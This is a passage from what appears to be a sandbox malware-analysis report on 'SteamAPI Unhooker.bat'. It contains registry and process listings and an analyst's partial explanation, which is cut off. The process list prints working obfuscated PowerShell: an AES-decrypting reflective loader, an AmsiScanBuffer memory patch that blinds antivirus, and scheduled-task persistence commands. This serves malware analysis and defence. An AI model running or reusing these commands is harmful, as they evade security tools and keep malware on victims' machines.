| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_851_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_851.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_851.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_851.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_851.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_851.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Users\Admin\AppData\Local\Temp\New.exe
"C:\Users\Admin\AppData\Local\Temp\New.exe"
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IuyCWJkisuTU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YAzhxpEmyrHkOT,[Parameter(Position=1)][Type]$CfNhPfEYyU)$kDaEVTJdpod=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+''+'a'+'te'+'T'+''+'y'+'p'+[Char](101)+'','Cl'+'a'+''+[Char](115)+''+[Char](115)+''+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+'ns'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+'o'+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$kDaEVTJdpod.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+','+[Char](72)+'id'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$YAzhxpEmyrHkOT).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$kDaEVTJdpod.DefineMethod('In'+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+''+'N'+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+',V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$CfNhPfEYyU,$YAzhxpEmyrHkOT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'na'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $kDaEVTJdpod.CreateType();}$POrcYcWUgJBIf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+'ft'+'.'+''+'W'+''+[Char](105)+'n'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'Nati'+[Char](118)+'eMeth'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$wNchLwuaiowFYq=$POrcYcWUgJBIf.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+'d'+'dr'+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$nWBlBrwJgsiKqphXiUC=IuyCWJkisuTU @([String])([IntPtr]);$pNyfmIKSXoTTmSDdmHUKNX=IuyCWJkisuTU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HNuYCnQvHyE=$POrcYcWUgJBIf.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'H'+'a'+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$cZwTOoVxWgYzMx=$wNchLwuaiowFYq.Invoke($Null,@([Object]$HNuYCnQvHyE,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$gPyFsZSGxwzeqVVQX=$wNchLwuaiowFYq.Invoke($Null,@([Object]$HNuYCnQvHyE,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+''+[Char](116)+'')));$MLoamvq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cZwTOoVxWgYzMx,$nWBlBrwJgsiKqphXiUC).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$HLydpmzCDUFRYIBYp=$wNchLwuaiowFYq.Invoke($Null,@([Object]$MLoamvq,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'ff'+'e'+''+'r'+'')));$sqstUVUVCh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gPyFsZSGxwzeqVVQX,$pNyfmIKSXoTTmSDdmHUKNX).Invoke($HLydpmzCDUFRYIBYp,[uint32]8,4,[ref]$sqstUVUVCh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HLydpmzCDUFRYIBYp,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gPyFsZSGxwzeqVVQX,$pNyfmIKSXoTTmSDdmHUKNX).Invoke($HLydpmzCDUFRYIBYp,[uint32]8,0x20,[ref]$sqstUVUVCh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d406b1dd-2799-49a1-a67c-f1f0a392fa31}
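The two `powershell.exe -noprofile -windowstyle hidden -ep bypass -command …` entries in the process list (one launched from the submitted `SteamAPI Unhooker.bat`, one from the persistence copy `startup_str_851.bat`, which the Files section below shows has the same SHA256 as the submitted sample) are the same loader. Reading past the reversed-string tricks (`'gnirtS46esaBmorF'[-1..-16] -join ''` is `FromBase64String`, `'daoL'[-1..-4]` is `Load`, `'txeTllAdaeR'[-1..-11]` is `ReadAllText`), it reads its own .bat file, takes the first line that starts with `:: ` (a batch comment, so cmd.exe skips it), splits the rest of that line on `\` into two base64 blobs, and for each blob base64-decodes, AES-CBC-decrypts with the hard-coded 32-byte key and 16-byte IV, gunzips, then calls `[Reflection.Assembly]::Load` and `EntryPoint.Invoke`. The first payload is invoked with no arguments, the second with an empty `string[]`. The script below is an added example, not code from the report or from the sample: it runs the same decrypt-and-decompress chain offline and 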